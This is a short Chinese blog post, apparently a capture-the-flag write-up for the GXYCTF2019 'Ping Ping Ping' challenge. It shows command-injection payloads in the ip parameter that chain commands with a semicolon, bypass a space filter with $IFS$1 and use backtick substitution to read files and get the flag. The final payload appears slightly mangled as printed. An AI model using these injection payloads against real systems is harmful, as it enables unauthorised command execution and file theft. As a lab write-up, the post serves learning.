Always keep a beginner'|

Xxiaomaa

园龄:3个月粉丝:0关注:0

[GXYCTF2019]Ping Ping Ping 1 - Xxiaoma解题

打开后,发现显示一个 /?ip=
我们直接在url里添加/?ip=127.0.0.1,发现有回显,这时候就可以用分号来进行命令链接执行了。
输入url/?ip=127.0.0.1;ls
回显出来两个php文件!

直接构造payload:/?ip=127.0.0.1;cat /flag.php

才发现没那么简单,回显过滤了空格,可以使用$IFS$1来绕过空格,来进行查看。
再次构造payload:/?ip=127.0.0.1;cat$IFS$1flag.php

发现还是被过滤了

直接先查看index.php

过滤了很多很多

最后构造payload:/?ip=127.0.0.1;cat$IFS$1ls`` ---- ls用反引号包裹,键盘左上角esc下面

最后f12键查看源代码后即可得到flag

本文作者:Xxiaomaa

本文链接:https://www.cnblogs.com/mhwq/p/18529323

版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。

posted @   Xxiaomaa  阅读(15)  评论(0编辑  收藏  举报
点击右上角即可分享
微信分享提示
评论
收藏
关注
推荐
深色
回顶
收起